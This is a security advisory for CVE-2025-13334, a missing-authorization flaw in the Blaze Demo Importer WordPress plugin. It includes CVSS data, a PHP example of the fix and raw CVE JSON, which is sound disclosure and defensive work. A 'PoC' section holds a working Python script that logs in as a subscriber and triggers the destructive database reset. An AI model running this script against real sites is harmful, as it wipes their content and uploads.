Security Vulnerability Report
CVE-2025-13334 CVSS 8.1 HIGH


Published: 2025-12-12 04:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Blaze Demo Importer plugin for WordPress is vulnerable to unauthorized database resets and file deletion due to a missing capability check on the "blaze_demo_importer_install_demo" function in all versions up to, and including, 1.0.13. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the database by truncating all tables (except options, usermeta, and users), delete all sidebar widgets, theme modifications, and content of the uploads folder.
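The weakness class here is CWE-862 (missing authorization): an admin-ajax handler that performs a destructive action without verifying the caller. The following is an added illustration, not the plugin's own code; the handler and helper names (bdi_install_demo_unprotected, bdi_install_demo_protected, bdi_reset_site_content, the 'bdi_install_demo' nonce action) are hypothetical, chosen only to show the pattern and its fix.

```php
<?php
// Added example (hypothetical, simplified). Shows the CWE-862 pattern behind this
// advisory and the two checks a destructive WordPress admin action needs.

// Hypothetical helper standing in for the destructive work the advisory describes
// (truncating tables, deleting widgets, theme mods and uploads). Body omitted.
function bdi_reset_site_content() {}

// BEFORE (shown for comparison, deliberately NOT registered in this file):
// any logged-in user who can reach admin-ajax.php can fire this action, because
// nothing verifies who is calling or whether they may reset the site.
function bdi_install_demo_unprotected() {
    bdi_reset_site_content();
    wp_send_json_success( 'Demo installed.' );
}

// AFTER: verify (1) a nonce bound to this action, which also blocks CSRF, and
// (2) a capability that only administrators hold. Order matters: fail closed
// before any destructive call runs.
function bdi_install_demo_protected() {
    // check_ajax_referer() stops the request with a 403 if the nonce is
    // missing or invalid; the nonce must be sent in the 'nonce' field.
    check_ajax_referer( 'bdi_install_demo', 'nonce' );

    // Subscribers, contributors, authors and editors all lack manage_options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }

    bdi_reset_site_content();
    wp_send_json_success( 'Demo installed.' );
}
add_action( 'wp_ajax_blaze_demo_importer_install_demo', 'bdi_install_demo_protected' );

// The admin page that offers the button issues the matching nonce to its JS
// (e.g. via wp_localize_script) so legitimate requests can pass the check.
function bdi_install_demo_nonce() {
    return wp_create_nonce( 'bdi_install_demo' );
}
```

If the same action is also exposed through admin-post.php (an `admin_post_` hook), that handler needs the identical nonce and capability checks; `wp_ajax_nopriv_` variants should not be registered for a destructive action at all.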

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Blaze Demo Importer Plugin <= 1.0.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-13334 PoC - Blaze Demo Importer Unauthorized Database Reset
# Target: WordPress site with Blaze Demo Importer plugin <= 1.0.13
target_url = "http://target-wordpress-site.com"

# Authentication credentials (subscriber level or higher)
username = "attacker"
password = "password123"

# Create session
session = requests.Session()

# Step 1: Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Trigger the vulnerable function via admin-ajax.php
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
data = {
    "action": "blaze_demo_importer_install_demo"
}

# Step 3: Send exploit request
response = session.post(ajax_url, data=data)

# Step 4: Alternative via admin-post.php
post_url = f"{target_url}/wp-admin/admin-post.php"
post_data = {
    "action": "blaze_demo_importer_install_demo"
}
response = session.post(post_url, data=post_data)

print(f"Response Status: {response.status_code}")
print(f"Response: {response.text}")

# This will truncate all database tables (except wp_options, wp_usermeta, wp_users)
# and delete all sidebar widgets, theme modifications, and uploads folder content

References

Weakness: CWE-862 (Missing Authorization)

- https://plugins.trac.wordpress.org/browser/blaze-demo-importer/tags/1.0.13/blaze-demo-importer.php?marks=67-89#L68
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d83cd6a0-d69c-4e6c-b76f-00c398b5f7e6?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13334", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blaze Demo Importer plugin for WordPress is vulnerable to unauthorized database resets and file deletion due to a missing capability check on the \"blaze_demo_importer_install_demo\" function in all versions up to, and including, 1.0.13. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the database by truncating all tables (except options, usermeta, and users), delete all sidebar widgets, theme modifications, and content of the uploads folder."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/blaze-demo-importer/tags/1.0.13/blaze-demo-importer.php?marks=67-89#L68", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d83cd6a0-d69c-4e6c-b76f-00c398b5f7e6?source=cve", "source": "[email protected]"}]}}